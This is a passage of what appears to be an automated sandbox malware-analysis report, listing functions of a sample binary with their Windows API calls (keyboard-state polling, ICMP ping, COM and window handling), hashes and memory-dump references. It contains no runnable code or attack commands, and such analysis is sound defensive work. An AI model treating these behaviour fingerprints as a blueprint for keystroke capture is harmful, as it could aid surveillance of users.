                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend$LongWindow_memset
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 830647256-0
                                                                                                                                                          • Opcode ID: 3188a799deb74affacae4f8289edb1d9cb7524537460156e6017b24c0c798f2d
                                                                                                                                                          • Instruction ID: 2b19cdf5fa65caeece76a7f62a665f9bd64faace48285484c045e7896d7aec41
                                                                                                                                                          • Opcode Fuzzy Hash: 3188a799deb74affacae4f8289edb1d9cb7524537460156e6017b24c0c798f2d
                                                                                                                                                          • Instruction Fuzzy Hash: 76615A75A00248AFDB11EFA4DC81EEEB7F8AF09704F140159FA15AB292D770AA45DF50
                                                                                                                                                          Function 00163569 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetKeyboardState.USER32(?), ref: 00163591
                                                                                                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00163612
                                                                                                                                                          • GetKeyState.USER32(000000A0), ref: 0016362D
                                                                                                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00163647
                                                                                                                                                          • GetKeyState.USER32(000000A1), ref: 0016365C
                                                                                                                                                          • GetAsyncKeyState.USER32(00000011), ref: 00163674
                                                                                                                                                          • GetKeyState.USER32(00000011), ref: 00163686
                                                                                                                                                          • GetAsyncKeyState.USER32(00000012), ref: 0016369E
                                                                                                                                                          • GetKeyState.USER32(00000012), ref: 001636B0
                                                                                                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 001636C8
                                                                                                                                                          • GetKeyState.USER32(0000005B), ref: 001636DA
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: State$Async$Keyboard
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 541375521-0
                                                                                                                                                          • Opcode ID: d0f829be9f722daa5bda6fece1d7995c73b09bfd3535c02793ac2b9082bf3e52
                                                                                                                                                          • Instruction ID: 13ca112fb3a2d766b2ba95c695bb407d365759ea01d09e4b5fc5331491a1941d
                                                                                                                                                          • Opcode Fuzzy Hash: d0f829be9f722daa5bda6fece1d7995c73b09bfd3535c02793ac2b9082bf3e52
                                                                                                                                                          • Instruction Fuzzy Hash: 1D41B260904BC97DFF319B64CC143B5BEA1AB12344F48805DD5D7476C2EBA49BE8CBA2
                                                                                                                                                          Function 0015A28D Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 0015A2AA
                                                                                                                                                          • SafeArrayAllocData.OLEAUT32(?), ref: 0015A2F5
                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 0015A307
                                                                                                                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 0015A327
                                                                                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 0015A36A
                                                                                                                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 0015A37E
                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 0015A393
                                                                                                                                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 0015A3A0
                                                                                                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0015A3A9
                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 0015A3BB
                                                                                                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0015A3C6
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2706829360-0
                                                                                                                                                          • Opcode ID: ff7fdb0d8966cb296755f4ee9994fdbb59e00fe7a6daeb28ea3906efaafe05b8
                                                                                                                                                          • Instruction ID: 71f33b424bf1881a414f34c90d05191e2126c8b142646be2bccefeb16a42fabf
                                                                                                                                                          • Opcode Fuzzy Hash: ff7fdb0d8966cb296755f4ee9994fdbb59e00fe7a6daeb28ea3906efaafe05b8
                                                                                                                                                          • Instruction Fuzzy Hash: 34414171900219EFCB01DFA4DC849DEBFB9FF48315F408065F912A7661DB70AA89CBA1
                                                                                                                                                          Function 0017B250 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 001284A6: __swprintf.LIBCMT ref: 001284E5
                                                                                                                                                            • Part of subcall function 001284A6: __itow.LIBCMT ref: 00128519
                                                                                                                                                          • CoInitialize.OLE32 ref: 0017B298
                                                                                                                                                          • CoUninitialize.COMBASE ref: 0017B2A3
                                                                                                                                                          • CoCreateInstance.COMBASE(?,00000000,00000017,001AD8FC,?), ref: 0017B303
                                                                                                                                                          • IIDFromString.COMBASE(?,?), ref: 0017B376
                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 0017B410
                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 0017B471
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                          • API String ID: 834269672-1287834457
                                                                                                                                                          • Opcode ID: fb8e397f9cfca95a01b1c84770295b848aaa4ed8e7724693f1bbbdfbcf46a296
                                                                                                                                                          • Instruction ID: 33c1dc7b055d2799008dc37ecf9c4d4ad5a14603ab63ab98212604b1b011b3f5
                                                                                                                                                          • Opcode Fuzzy Hash: fb8e397f9cfca95a01b1c84770295b848aaa4ed8e7724693f1bbbdfbcf46a296
                                                                                                                                                          • Instruction Fuzzy Hash: F5618D71208711AFC710DF54D885BAEB7F8BF89714F148419F98A9B292D770ED84CB92
                                                                                                                                                          Function 00178694 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • WSAStartup.WS2_32(00000101,?), ref: 001786F5
                                                                                                                                                          • inet_addr.WS2_32(?), ref: 0017873A
                                                                                                                                                          • gethostbyname.WS2_32(?), ref: 00178746
                                                                                                                                                          • IcmpCreateFile.IPHLPAPI ref: 00178754
                                                                                                                                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 001787C4
                                                                                                                                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 001787DA
                                                                                                                                                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 0017884F
                                                                                                                                                          • WSACleanup.WS2_32 ref: 00178855
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                          • String ID: Ping
                                                                                                                                                          • API String ID: 1028309954-2246546115
                                                                                                                                                          • Opcode ID: bad5c75352d3f2a38b448190acd412a9a3eee44c40c55f8188fe0f30dd207da2
                                                                                                                                                          • Instruction ID: a90eecf0cc44b2f54e218b41baab82014a8cb78fb3edd03e5b08c3a20a0ec8f5
                                                                                                                                                          • Opcode Fuzzy Hash: bad5c75352d3f2a38b448190acd412a9a3eee44c40c55f8188fe0f30dd207da2
                                                                                                                                                          • Instruction Fuzzy Hash: D451A131A446009FD714EF64DC89B6ABBF4EF58724F14892AF55ADB2A1DB30EC41CB42
                                                                                                                                                          Function 00189C50 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • _memset.LIBCMT ref: 00189C68
                                                                                                                                                          • CreateMenu.USER32 ref: 00189C83
                                                                                                                                                          • SetMenu.USER32(?,00000000), ref: 00189C92
                                                                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00189D1F
                                                                                                                                                          • IsMenu.USER32(?), ref: 00189D35
                                                                                                                                                          • CreatePopupMenu.USER32 ref: 00189D3F
                                                                                                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00189D70
                                                                                                                                                          • DrawMenuBar.USER32 ref: 00189D7E
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                                                          • String ID: 0
                                                                                                                                                          • API String ID: 176399719-4108050209
                                                                                                                                                          • Opcode ID: 4790ae252921daa2823fdaa7e511ad9417dab4b5d96416f61ac208e1869881ba
                                                                                                                                                          • Instruction ID: b119b4eaa1b8f801327f860d223a641cb708fa75e872570f633491ad01f1be88
                                                                                                                                                          • Opcode Fuzzy Hash: 4790ae252921daa2823fdaa7e511ad9417dab4b5d96416f61ac208e1869881ba
                                                                                                                                                          • Instruction Fuzzy Hash: 12413975A00209EFDB10EFA4E884BEA7BF5FF49314F180518E94AAB351D730AA50DF64
                                                                                                                                                          Function 0016EC11 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0016EC1E
                                                                                                                                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0016EC94
                                                                                                                                                          • GetLastError.KERNEL32 ref: 0016EC9E
                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 0016ED0B
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                          • API String ID: 4194297153-14809454
                                                                                                                                                          • Opcode ID: c59cac1d32f324b5fa7cdbb58e5a368bfb81fc5bab20efb529796c6a4397d357
                                                                                                                                                          • Instruction ID: c0fe45518a3c4afbd15c7711349f786647ababa61af1ba50f16a740a42b69702
                                                                                                                                                          • Opcode Fuzzy Hash: c59cac1d32f324b5fa7cdbb58e5a368bfb81fc5bab20efb529796c6a4397d357
                                                                                                                                                          • Instruction Fuzzy Hash: 8F31C139A002099FC700EF68DD49EAEB7F4FF54700F144226F502E7291DB719A61CB91
                                                                                                                                                          Function 0015C6FD Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0012CAEE: _memmove.LIBCMT ref: 0012CB2F
                                                                                                                                                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0015C782
                                                                                                                                                          • GetDlgCtrlID.USER32 ref: 0015C78D
                                                                                                                                                          • GetParent.USER32 ref: 0015C7A9
                                                                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 0015C7AC
                                                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 0015C7B5
                                                                                                                                                          • GetParent.USER32(?), ref: 0015C7D1
                                                                                                                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 0015C7D4
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                          • API String ID: 313823418-1403004172
                                                                                                                                                          • Opcode ID: 7aac0843c70bc587a455ed1b2fb3b7ea670fb3fff1d3531c15db8511bf5e8f71
                                                                                                                                                          • Instruction ID: fd1f065744d127237c6aea155a03c793f828303488586a556cd1f1dd3010df70
                                                                                                                                                          • Opcode Fuzzy Hash: 7aac0843c70bc587a455ed1b2fb3b7ea670fb3fff1d3531c15db8511bf5e8f71
                                                                                                                                                          • Instruction Fuzzy Hash: AA21C175A00208AFCF08EF60DC85EFEBBA9EB5A301F100115F926976D1DB745859EF60
                                                                                                                                                          Function 0015C7E6 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0012CAEE: _memmove.LIBCMT ref: 0012CB2F
                                                                                                                                                          • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0015C869
                                                                                                                                                          • GetDlgCtrlID.USER32 ref: 0015C874
                                                                                                                                                          • GetParent.USER32 ref: 0015C890
                                                                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 0015C893
                                                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 0015C89C
                                                                                                                                                          • GetParent.USER32(?), ref: 0015C8B8
                                                                                                                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 0015C8BB
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                          • API String ID: 313823418-1403004172
                                                                                                                                                          • Opcode ID: 028d6b7587e7e80bcf2418395b4ec9dabdf906eafd9de82953d9f96c110d4f5a
                                                                                                                                                          • Instruction ID: e4ceff2cf7a8050ed750749c37a542286b698869c4148d7462b0480bd735216b
                                                                                                                                                          • Opcode Fuzzy Hash: 028d6b7587e7e80bcf2418395b4ec9dabdf906eafd9de82953d9f96c110d4f5a
                                                                                                                                                          • Instruction Fuzzy Hash: BF21B371A00208BFDF04AF64DC85EFEB7B9EF55301F140015F926EB191DB7459599B60
                                                                                                                                                          Function 0015C8CD Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetParent.USER32 ref: 0015C8D9
                                                                                                                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 0015C8EE
                                                                                                                                                          • _wcscmp.LIBCMT ref: 0015C900
                                                                                                                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0015C97B
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                          • API String ID: 1704125052-3381328864
                                                                                                                                                          • Opcode ID: ef7f17c17c93dc65f89e50ea9ffc551f72bf0f389b6f62682cd2f4f0d421eaf5
                                                                                                                                                          • Instruction ID: 3c4c7e69004fcad47d45105026236e3c9d9d59d616a778f7c1975887377f2422
                                                                                                                                                          • Opcode Fuzzy Hash: ef7f17c17c93dc65f89e50ea9ffc551f72bf0f389b6f62682cd2f4f0d421eaf5
                                                                                                                                                          • Instruction Fuzzy Hash: 8811C676648702FDFA182E30AC0ACA677ECDB27769B200017FD25A90E2FBA1694545D4
                                                                                                                                                          Function 0016B05A Relevance: 15.3, APIs: 10, Instructions: 317COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0016B137
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
